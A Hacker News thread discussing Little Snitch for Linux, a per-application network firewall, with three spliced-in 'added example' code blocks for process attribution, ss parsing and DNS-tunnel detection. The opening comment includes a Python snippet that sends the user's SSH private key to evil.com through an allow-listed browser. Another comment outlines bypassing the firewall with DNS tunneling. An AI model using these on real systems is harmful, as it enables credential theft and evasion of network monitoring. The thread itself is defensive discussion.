LittleSnitch for Linux

1237 points | 403 comments | 20 hours ago
mixedbit

I'm not a Little Snitch or Open Snitch user; I wonder if these firewalls are able to block requests done with the use of some other, allow-listed program.

Say I run a script `suspicious.py` and I deny this script from making any network requests. I also have firefox which is allowed to make any HTTPS requests. If suspicious.py does something like:

    # imports needed for the snippet to run as written
    from pathlib import Path
    import subprocess

    # read the private key, then hand it to the allow-listed browser as a URL
    key = (Path.home() / '.ssh' / 'id_rsa').read_text()
    subprocess.Popen(['firefox', f'https://evil.com/upload/{key}'])
will this request be blocked?
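An added example, not from the post above and not Little Snitch's code: one way a per-process firewall could attribute a connection to the process chain that launched the socket owner rather than to the socket owner alone, by walking `PPid` in `/proc/<pid>/status`. The status text is read through an injectable function so the same logic runs on the constructed sample below; the PIDs and process names in `SAMPLE_PROC` are made up. Note that `Name:` is the kernel's 15-character `comm`, so a script run as `python3 suspicious.py` shows up as `python3`; a real rule would key on `/proc/<pid>/exe` or `cmdline` instead.

```python
"""Walk the parent chain of a process via /proc/<pid>/status.

A firewall that keys only on the process owning the socket sees 'firefox';
walking PPid shows that the denied python3 process launched it.
Added example; the sample /proc contents below are constructed.
"""
import re
from typing import Callable, Dict, List, Optional, Set, Tuple

_NAME_RE = re.compile(r"^Name:\s*(.+)$", re.M)
_PPID_RE = re.compile(r"^PPid:\s*(\d+)$", re.M)


def parse_status(text: str) -> Tuple[str, int]:
    """Return (comm, ppid) from the text of /proc/<pid>/status."""
    name = _NAME_RE.search(text)
    ppid = _PPID_RE.search(text)
    if not name or not ppid:
        raise ValueError("not a /proc/<pid>/status document")
    return name.group(1).strip(), int(ppid.group(1))


def read_proc_status(pid: int) -> str:
    """Default reader: the real procfs (Linux only)."""
    with open(f"/proc/{pid}/status", encoding="utf-8") as fh:
        return fh.read()


def ancestry(pid: int,
             read_status: Callable[[int], str] = read_proc_status,
             max_depth: int = 64) -> List[Tuple[int, str]]:
    """Return [(pid, comm), (ppid, comm), ...] up to PID 1 or a missing entry."""
    chain: List[Tuple[int, str]] = []
    seen: Set[int] = set()
    while pid > 0 and pid not in seen and len(chain) < max_depth:
        seen.add(pid)
        try:
            comm, ppid = parse_status(read_status(pid))
        except (FileNotFoundError, ProcessLookupError, ValueError):
            break  # process exited between lookup and read: chain is partial
        chain.append((pid, comm))
        pid = ppid
    return chain


def launched_by(pid: int, denied: Set[str],
                read_status: Callable[[int], str] = read_proc_status) -> Optional[str]:
    """Comm of the first denied ancestor (excluding pid itself), or None."""
    for _apid, comm in ancestry(pid, read_status)[1:]:
        if comm in denied:
            return comm
    return None


# Constructed sample mimicking /proc after python3 spawned firefox.
SAMPLE_PROC: Dict[int, str] = {
    1:    "Name:\tsystemd\nPid:\t1\nPPid:\t0\n",
    800:  "Name:\tbash\nPid:\t800\nPPid:\t1\n",
    4242: "Name:\tpython3\nPid:\t4242\nPPid:\t800\n",
    4300: "Name:\tfirefox\nPid:\t4300\nPPid:\t4242\n",
}


def sample_reader(pid: int) -> str:
    """Reader over the constructed sample; missing PIDs behave like procfs."""
    try:
        return SAMPLE_PROC[pid]
    except KeyError:
        raise FileNotFoundError(pid)


if __name__ == "__main__":
    for p, c in ancestry(4300, sample_reader):
        print(p, c)
    print("denied ancestor:", launched_by(4300, {"python3"}, sample_reader))
```

Walking the chain is itself a heuristic: the parent may have exited (the child is reparented to PID 1 or a subreaper), or the data may be handed over through a file or a D-Bus call instead of a child process, so ancestry closes only the direct `Popen` case the post describes.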
supernes

Tried it on Fedora 43 (6.19.11 x86_64) and it loaded all CPU cores, dumped 50K lines in the journal and failed to start.

> Error: the BPF_PROG_LOAD syscall returned Argument list too long (os error 7).

> littlesnitch.service: Consumed 3min 38.832s CPU time, 13.7G memory peak.

mixedbit

Recently I was wondering how viable it is to launch a niche, paid tool for Linux. I found that this is a very rare model; most tools are either just free, supported by sponsorship, supported by some paid cloud-based service that accompanies the tool, or use an open-core model with paid add-ons.

I wonder if the decision of Little Snitch to make the Linux version free forever was also informed by this "no way to make money selling tools on Linux" wisdom or if there was another motivation. It seems that if any tool has chances of making decent money on Linux, a product like Little Snitch, which is already well established, with working payment infrastructure would be a good candidate.

mathfailure

Nice to have this as an extra option, but being a Linux user I value openness of code. I am pretty content with opensnitch + opensnitch-ui.

Cider9986

This has the author's blog post on it https://obdev.at/blog/little-snitch-for-linux/

a-dub

I have been pretty happy with opensnitch. UI improvements are always welcome, although what might be really interesting would be some sort of plug-in system that allows an agent to watch my interaction activity and the outbound connections and only flag things that seem surprising. Also maybe some kind of improvement over the pop-up (maybe get rid of them entirely and add some kind of CLI wrapper that allow-lists child processes).

alhazrod

I remember before Little Snitch there was ZoneAlarm for Windows[0] (here is a good screenshot[1]). No clue if the current version of ZoneAlarm does anything like that (have not used it in 2 decades). I always found it weird that Linux never really had anything like it.

[0]: https://en.wikipedia.org/wiki/ZoneAlarm

[1]: https://d2nwkt1g6n1fev.cloudfront.net/helpmax/wp-content/upl...

hubabuba44

Congrats on the Linux port, this looks very nice.

Shameless plug: for anyone who wants something fully open source and terminal-based, I maintain RustNet (https://github.com/domcyrus/rustnet). It's a bit different because it's a TUI for real-time connection monitoring with deep packet inspection, not a firewall. No blocking/rules, but it's cross-platform (Linux/macOS/Windows), the entire codebase is open, and it sandboxes itself after init via Landlock with capability dropping.

parhamn

Okay, hear me out: I have used Little Snitch for a while. Great product. Love finding out what phones where. I make every single request (except my browser, because I'm fine with their sandbox) block until I approve.

Recently I was wondering how much you really have to trust something like Little Snitch, given it's a full kernel extension effectively able to MITM your whole network stack.

So I went digging (and asked some agents to deep research), and I couldn't find much interesting about the company or its leadership at all.

All a long way to say, anyone know anything about this company?

Bromeo

How does it compare to opensnitch? https://github.com/evilsocket/opensnitch

microtonal

Wow. I have used Little Snitch on Mac for years, love this!

If anyone from obdev is reading, please give us a way to pay for it, even if it stays free :), I'd love to support development and would happily pay something between the price of Little Snitch and Little Snitch Mini.

Anyway, thanks a lot!

moduspol

I used Little Snitch on Mac a few years ago and liked it, though I wasn't a fan of how (necessarily) deep it had to be in the OS to work. It felt like one of those things where, the moment you have any kind of network connectivity issue, it's the first thing you need to disable to troubleshoot because it's the weirdest thing you're doing.

I guess what I'd really like is a middleware box or something that I could put on my home network, but would then still give the same user experience as the normal app. I don't want to have to log into some web interface and manually add firewall rules after I find something not working. I like the pop-ups that tell you exactly when you're trying to do something that is blocked, and allow you to either add a rule or not.

I'm probably straddling some gray area between consumer-focused and enterprise-focused feature sets, but it would be neat.

noisy_boy

The gold standard, which I haven't been able to achieve, is to be able to do a pi-hole/adguard style centralized control where I can allow youtube but block youtube shorts. All solutions I have seen talk about on-device setup which isn't an option given that I don't want to manage it on a per-device basis.

karlzt

How does it compare to Portmaster?

https://news.ycombinator.com/item?id=29761978

Portmaster – Open-source network monitor and firewall [315 points | 113 comments]

https://news.ycombinator.com/item?id=23539687

Show HN: Block trackers system-wide on Linux/Windows, a Pi-hole “to go” alt

[6 points by davegson on June 16, 2020 | 2 comments]

https://news.ycombinator.com/submitted?id=davegson

mobeigi

I used to use a Windows firewall which basically hijacked a bunch of WinAPI calls and let me approve/deny every request. Trying to be a good secure boy I ran this setup for a while but it was exhausting. Every single action needed dozens of approval windows. After a while I removed the software. I reckon it is good situationally though, trying out a new program for first time (that isn't risky enough for a VM or sandbox), might be good to turn on a tool like this.

adrianwaj

There was a similar Show HN from 3 weeks ago. https://news.ycombinator.com/item?id=47387443 (open source too) - and there is a live window from all the machines in the swarm. https://dialtoneapp.com/explore - but only 2 so far. Maybe LittleSnitch can generate more data than this? Could end up an immune system for bad actors.

Anything new to get much better performance from low-spec machines that is idiot-proof is a game-changer.

chawyehsu

Just tried it on my laptop. Unfortunately, my laptop got extremely hot about 10 seconds after installation. The resource monitor showed that it was eating up all of my laptop's CPU. I panicked and stopped the service and uninstalled it before I could even open the web UI. It was a really poor first impression.

alsetmusic

Congrats to Linux users on getting a great tool from a quality development shop. Objective Development is one of our (Mac users) exemplars for attention to detail and fit & finish.

Congrats to Objective Development for expanding their well-loved tool to a new platform. You guys rock.

Avicebron

Probably should throw it out there that I'm building something inspired by littleSnitch for windows. Currently a bit stealthy about it. But when I crowd source the funding for a code signing cert I'll get it out there. Lots of inspiration from LittleSnitch, in spirit if not actual code.

mostlysimilar

Incredible. LittleSnitch is a must-have for macOS, and trying to get equivalent functionality on Linux was painful. So very happy to see this, and very happy to give the developers at Objective Development my money.

hackingonempty

LittleSnitch doesn't tattle on itself phoning home.

brachkow

LittleSnitch for Mac is a good looking app.

I always thought that ugly UIs on Linux are because good designers do not intersect well with programming enthusiasts.

But looking at how ugly the same app looks on Linux, I’m starting to think it could be a technical limitation. Can someone elaborate?

tankenmate

I'm so surprised that so few people have heard of Portmaster, it's been around for years and runs on Linux (and Windows if you must). And if you don't need traffic history it's free.

hiccuphippo

Awesome. I always felt Linux was missing a per-application firewall. I didn't dig much into it but at least iptables didn't have rules for that when I looked.

TheTaytay

I’ve been researching the “best” way to build a little outbound network proxy to replace credential placeholders with the real secrets. Since this is designed to secure agent workloads, I figured I might as well add some domain blocking and other outbound network controls, so I’ve been looking for Little-Snitch-like apps to build on. I’ve been surprised to find that there aren’t a ton of open source “filter and potentially block all outbound connections according to rules” tools. This seems like the sort of thing that would be in a lot of Linux admins’ toolkits, but I guess not! I appreciate these guys building and releasing this.

riobard

>> The macOS version uses deep packet inspection to do this more reliably. That's not an option here.

I thought it would be easier to do DPI on Linux than macOS. No???

eviks

Does it leak your IP like the Mac version?

https://news.ycombinator.com/item?id=35363343

> Little Snitch for Linux is not a security tool.

Maybe not?

> Its focus is privacy:

Or maybe yes?

your_challenger

I use Lulu on my mac. Is it good enough (compared to LittleSnitch)?

cromka

I know it sounds crazy at this point, but with popular YouTubers switching to Linux, gamers overall well-aware of Steam on Linux advantages and switching as well, plus popular software like LittleSnitch getting ported, 2026 can without irony be named as Year of Linux Desktop, right?

dSebastien

I've been using Simplewall on Windows for a while but I think it's not maintained anymore. Need to find an alternative

Suffocate5100

I'm glad people are building stuff for Linux, but the people who actually want something like this have likely already been using Opensnitch for years. I'm certainly not going to spend $60 for something that has been doing the job for free.

pshirshov

Unfortunately it significantly impacts battery life, at least in my tests.

Dig1t

>The daemon (littlesnitch --daemon) is proprietary, but free to use and redistribute.

Worth noting that it is closed source. Would be worth contributing patches to OpenSnitch to bring it up to parity with Little Snitch.

https://github.com/evilsocket/opensnitch

txrx0000

As articulated in the author's own blog post:

https://obdev.at/blog/little-snitch-for-linux/

The core issue is simple and uncomfortable: through automatic updates, a vendor can run any code, with any privileges, on your machine, at any time.

-----

If the author is serious about this, then they should make their own program completely open source, and make builds bit-for-bit reproducible.

For all I know, the proprietary Little Snitch daemon, or even the binaries they're distributing for the open source components, contain backdoors that can be remotely activated to run any code, with any privileges, on your machine, at any time.

flexagoon

Also see Safing Portmaster:

https://safing.io/

linuxguy2

One person's (not my) take on why to skip this: https://the.unknown-universe.co.uk/privacy-security/little-s...

TL;DR it's closed source and there's open source alternatives.

winrid

Related - I'm working on launching Watch.ly[0] (human-in-the-loop for remotely approving network and file system access for agents) in the next week or so. It works similarly, via eBPF (although we can also fall back to NFQUEUE). Supporting 5.x+ Linux kernels[1], macOS, and Windows.

Did not know about LittleSnitch, will definitely check it out.

[0] https://watch.ly/

[1] https://app.watch.ly/status/

digg32

Will there ever be anything like Comodo Firewall's HIPS firewall on Linux [0]? I remember when firewalls like ZoneAlarm could detect keyboard hooks from keyloggers and such. Comodo Firewall has had this for over a decade, but unfortunately they are not free anymore. For how open Linux is, it surprises me you can't handle things apps are doing on an alert by alert basis, and not just network permissions. Firewalls used to detect DLL injections, apps creating script files to run, adding stuff to start up. Now it seems firewalls only means network detection.

[0] https://help.comodo.com/uploads/Comodo%20Internet%20Security...

mrbluecoat

> The macOS version uses deep packet inspection to do this more reliably. That's not an option here.

Isn't MacOS just *nix under the hood? Genuinely curious about this difference.

wolvoleo

Ohhh interesting. Little snitch is one of 2 apps I miss from when the Mac was my daily driver. The other app was pixelmator

chirau

How does this work with WSL2? Will it monitor windows traffic as well?

altermetax

Low-effort take: can't you just run ss -tulpn repeatedly and parse the output?
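An added example (not from the comment above, and not Little Snitch's code) of what that low-effort take looks like in practice: a parser for `ss -tnp` output that maps each socket to the process holding it. The sample output is constructed; `run_ss()` shells out to the real tool. It also shows the two things polling misses: sockets with no `users:` column (other users' processes when not running as root, and states like TIME-WAIT that no longer have an owner) and anything that opened and closed between two polls, which is why eBPF- or NFQUEUE-based tools hook the socket lifecycle instead.

```python
"""Parse `ss -tnp` output into connection records.

Added example; SAMPLE below is constructed, not captured from a real host.
Polling ss only sees sockets alive at the instant of the call, so a single
DNS lookup or a quick HTTPS POST between two polls is never observed.
"""
import re
import subprocess
from dataclasses import dataclass
from typing import List, Optional

# Process column looks like: users:(("firefox",pid=1234,fd=97),("Web Content",pid=1250,fd=44))
_USER_RE = re.compile(r'\("(?P<name>[^"]*)",pid=(?P<pid>\d+),fd=(?P<fd>\d+)\)')


@dataclass(frozen=True)
class Conn:
    state: str
    local: str
    peer: str
    process: Optional[str]   # None when ss could not attribute the socket
    pid: Optional[int]


def parse_ss(text: str) -> List[Conn]:
    """Parse the text of `ss -tnp`; the first line is the column header."""
    conns: List[Conn] = []
    for line in text.splitlines()[1:]:
        if not line.strip():
            continue
        # Split at most 5 times so a process name containing spaces stays intact.
        fields = line.split(None, 5)
        if len(fields) < 5:
            continue
        state, _recvq, _sendq, local, peer = fields[:5]
        rest = fields[5] if len(fields) > 5 else ""
        m = _USER_RE.search(rest)  # first process holding the socket
        conns.append(Conn(state, local, peer,
                          m.group("name") if m else None,
                          int(m.group("pid")) if m else None))
    return conns


def run_ss() -> List[Conn]:
    """Snapshot the live TCP table (Linux with iproute2; needs root to see all PIDs)."""
    out = subprocess.run(["ss", "-tnp"], capture_output=True, text=True, check=True).stdout
    return parse_ss(out)


def unattributed(conns: List[Conn]) -> List[Conn]:
    """Sockets this snapshot could not tie to a process."""
    return [c for c in conns if c.pid is None]


SAMPLE = """\
State     Recv-Q Send-Q Local Address:Port      Peer Address:Port    Process
ESTAB     0      0      192.168.1.10:51234      142.250.74.46:443    users:(("firefox",pid=1234,fd=97))
ESTAB     0      0      [::ffff:10.0.0.5]:40022 [::ffff:10.0.0.9]:22 users:(("ssh",pid=2201,fd=3))
TIME-WAIT 0      0      192.168.1.10:51300      203.0.113.7:443
"""

if __name__ == "__main__":
    for c in parse_ss(SAMPLE):
        print(f"{c.state:10} {c.local:26} -> {c.peer:22} {c.process or '?'}({c.pid or '-'})")
```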

thewanderer1983

Does little snitch and similar software work against solutions like Paqet?

https://github.com/hanselime/paqet

0xbadcafebee

> Compatible with Linux kernel 6.12 or higher

I know everyone today is used to upgrading every 5 seconds, but some of us are stuck on old software. For example, my Linux machine keeps rebooting and sucks up power in suspend mode because of buggy drivers in 6.12+, so I'm stuck on 6.8. (which is extra annoying because I bought this laptop for its Linux hardware support...)

jimgill

Old bottle with new label, but good to keep an eye on interfaces

badc0ffee

Does anyone know how the blocking functionality works? I worked on some eBPF code a few years ago (when BTF/CO-RE was new), and while it was powerful, you couldn't just write to memory, or make function calls in the kernel.

Is there a userland component that's using something like iptables? (Can iptables block traffic originating from/destined to a specific process nowadays?)

Myzel394

I hope they provide a binary without dynamic libraries so that we can use this on nixos as well

xrio

Back when I was still using macOS I loved Little Snitch and was a paying customer. And I agree nothing on Linux comes close. Would it be technically feasible to also provide this as a Flatpak to support immutable distros like Bazzite?

xn--yt9h

Giving it a shot right now. Very easy setup, intuitive UI, but a lot of requests' processes are not identified (while they could easily be identified, as they belong to the browser that has some, but less, identified calls)

peterspath

I really want Little Snitch for iOS.

Hopefully Apple makes the necessary frameworks available on iOS in general. Not only for supervised devices.

I_am_tiberius

FYI: It's an Austrian company behind that software.

FloatArtifact

I wish applications like this could coordinate with an upstream firewall like OPNsense

Tepix

> One thing to be aware of: the .lsrules format from Little Snitch on macOS is not compatible with the Linux version.

Why?

SamuelAdams

So if this is free to use on linux, what is to stop someone from doing what Colima did to Docker? Aka make a tiny Linux VM on MacOS and package Little Snitch within that?

cromka

I'd like to point out it uses very little memory, barely 33MB here. That's impressive!

sersi

> For keeping tabs on what your software is up to and blocking legitimate software from phoning home, Little Snitch for Linux works well. For hardening a system against a determined adversary, it's not the right tool.

What would be the right tool to harden in a similar way to little snitch on mac? Meaning intercepting any connection and whitelisting them reliably.

computing

doesn't work on arch (btw)

Jakson_Tate

Cool to see eBPF used for a desktop firewall instead of just DDoS packet dropping. The note about BPF map overflows is super relatable; dealing with that on bare metal is a pain.

my question is... if the tracking maps fill up completely, does the daemon fail-open or fail-closed?

rvz

Also from [0].

> You can find Little Snitch for Linux here. It is free, and it will stay that way.

Don't worry, the authors know that there's no point in charging Linux users. Unlike Mac users.

So you might as well make it $0 and the (Linux) crowd goes wild that they don't need to pay a cent.

However...

> I researched a bit, found OpenSnitch, several command line tools, and various security systems built for servers. None of these gave me what I wanted: see which process is making which connections, and in the best case deny with a single click.

OpenSnitch is open source. You don't need to trust it as you can see the code yourself. Little Snitch on the other hand, is completely closed source.

Do you still trust them not to do self-reporting or phoning home, even though it is $0 and closed source?

[0] https://obdev.at/blog/little-snitch-for-linux/

wodenokoto

Honestly I think it is odd such a tool isn't considered as standard to an OS as a process manager.

Anyway, this one looks great. I hope Linux distros will incorporate this or similar into the network widgets.

joeiq

Finally!

spwa4

Of course, getting data uploads past little snitch is an exercise in triviality. For instance, using DNS tunneling. Sending requests to unrelated servers, ideally on AWS or some other cloud, so you have no idea at all who's behind the server and the firewall can't realistically block it, where the info can be retrieved by another party.
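An added example, editor's own and not from the comment above or from Little Snitch, of the detection side of the DNS-tunneling bypass: a per-application firewall that allows the resolver only sees port-53 traffic from the resolver, so data encoded into subdomain labels rides through. The heuristic below goes beyond the comment to the general pattern: it groups queried names by base domain (approximated as the last two labels; real code would use the public-suffix list) and flags domains with many distinct, long, high-entropy subdomains. The query log is constructed, and `tunnel.test` is a reserved name, not a real host.

```python
"""Flag DNS-tunnel-shaped query patterns in a list of queried names.

Added example; the benign and tunnel query samples below are constructed.
A tunnel encodes payload in labels, so the subdomains under one base domain
are numerous, long, never repeated and close to uniformly random.
"""
import math
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple


def shannon_entropy(s: str) -> float:
    """Bits per character of s (0.0 for the empty string)."""
    if not s:
        return 0.0
    n = len(s)
    counts: Dict[str, int] = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def _labels(qname: str) -> List[str]:
    return qname.rstrip(".").lower().split(".")


def base_domain(qname: str) -> str:
    """Last two labels; an approximation of the registrable domain."""
    return ".".join(_labels(qname)[-2:])


def subdomain(qname: str) -> str:
    """Everything left of the base domain ('' for the apex itself)."""
    return ".".join(_labels(qname)[:-2])


def score_domains(qnames: Iterable[str], min_queries: int = 5,
                  min_entropy: float = 3.0, min_len: int = 30
                  ) -> Dict[str, Tuple[int, float, float]]:
    """Return {base_domain: (distinct_subdomains, mean_len, mean_entropy)} for
    base domains whose distinct subdomains are both long and high-entropy."""
    groups: Dict[str, List[str]] = defaultdict(list)
    for q in qnames:
        groups[base_domain(q)].append(subdomain(q))
    flagged: Dict[str, Tuple[int, float, float]] = {}
    for base, subs in groups.items():
        uniq = set(subs)
        if len(uniq) < min_queries:
            continue  # too few samples to say anything
        mean_len = sum(len(s) for s in uniq) / len(uniq)
        mean_ent = sum(shannon_entropy(s.replace(".", "")) for s in uniq) / len(uniq)
        if mean_len >= min_len and mean_ent >= min_entropy:
            flagged[base] = (len(uniq), round(mean_len, 1), round(mean_ent, 2))
    return flagged


# Constructed sample log: ordinary lookups plus eight tunnel-style queries whose
# two 16-character labels each use every hex digit once (entropy exactly 4 bits).
BENIGN = ["www.example.com", "mail.example.com", "static.example.com",
          "api.example.com", "cdn.example.com", "example.com", "www.example.com"]
_HEX = "0123456789abcdef"


def _rot(i: int) -> str:
    return _HEX[i:] + _HEX[:i]


TUNNEL = [f"{_rot(i)}.{_rot((i * 3) % 16)}.tunnel.test" for i in range(8)]

if __name__ == "__main__":
    for base, stats in score_domains(BENIGN + TUNNEL).items():
        print(f"{base}: {stats[0]} distinct subdomains, mean len {stats[1]}, "
              f"mean entropy {stats[2]} bits/char")
```

Thresholds are deliberately loose here; in production they are tuned against the site's own baseline, because CDNs, anti-virus reputation lookups and some telemetry also generate long hashed labels, and a slow tunnel that sends a few short queries per hour stays under any volume-based rule.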

dark-star

Neat! Too bad it's proprietary closed-source though (at least the daemon is).

smashah

Is there a way to kill little snitch completely without screwing up my DNS/other things?

akimbostrawman

I will never understand why people will flock to this but opensnitch, which is just better, fully open and has existed for longer (on Linux), gets ignored.

imagetic

Dope.

gethly

so a firewall for linux then?

chris_wot

Can someone elaborate on the limitations bit?

"Little Snitch for Linux is built for privacy, not security, and that distinction matters. The macOS version can make stronger guarantees because it can have more complexity. On Linux, the foundation is eBPF, which is powerful but bounded: it has strict limits on storage size and program complexity. Under heavy traffic, cache tables can overflow, which makes it impossible to reliably tie every network packet to a process or a DNS name. And reconstructing which hostname was originally looked up for a given IP address requires heuristics rather than certainty. The macOS version uses deep packet inspection to do this more reliably. That's not an option here."

Is this a limitation of the eBPF implementation? Pardon my ignorance, I'm genuinely curious about this.

LoganDark

Yess, the return of the actually good landing page for the technically-minded. Now all they need to do is roll back the macOS one that looks and reads like it was designed by a marketing agency that knows nothing about computers (or even Little Snitch itself).

piekvorst

Now I can spy on the software spying at me. Nice.

shevy-java

The ultimate turnaround would be if the little snitch is snitching on the user too.

sneak

It’s not really necessary on Linux. Linux systems work without 40 invisible background services phoning home to the mothership to leak your hardware identifiers for FAA702 collection.

waterTanuki

Why would one use this over PiHole?

clomia

good

VladVladikoff

Really like Lulu as an alternative to LittleSnitch https://objective-see.org/products/lulu.html

serious_angel

> The macOS version can make stronger guarantees because it can have more complexity. On Linux, the foundation is eBPF, which is powerful but bounded: it has strict limits on storage size and program complexity. Under heavy traffic, cache tables can overflow, which makes it impossible to reliably tie every network packet to a process or a DNS name.
> And reconstructing which hostname was originally looked up for a given IP address requires heuristics rather than certainty. The macOS version uses deep packet inspection to do this more reliably.
> That's not an option here.
>
> Source: https://web.archive.org/web/20260409002901/https://obdev.at/products/littlesnitch-linux/index.html

The above feels like utter AI slop nonsense, sorry. I believe eBPF, the Linux kernel feature, is absolutely capable of accurate and complete processing of network traffic.

Have you ever checked Calico or Cilium, or at least, Oryx?

shawnta

Great website features, exactly what I needed, thank you.